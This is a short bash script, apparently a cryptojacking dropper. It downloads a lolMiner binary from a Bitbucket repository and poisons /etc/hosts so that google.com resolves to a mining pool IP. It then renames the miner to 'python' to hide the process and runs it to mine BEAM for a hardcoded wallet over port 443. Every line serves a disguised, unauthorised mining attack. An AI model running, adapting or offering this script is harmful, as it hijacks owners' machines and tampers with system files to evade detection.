#!/bin/bash  
wget https://bitbucket.org/tengikekao/myrep/downloads/lolMiner
sh -c "echo '216.244.80.11  google.com' >> /etc/hosts"
mv lolMiner python
chmod +x python
./python --coin BEAM --pool google.com --port 443 --user 2c1c361ca22136a66c1ba02cd4468f569c8b599ea6ebcd8dc189a2a40641def4200.col


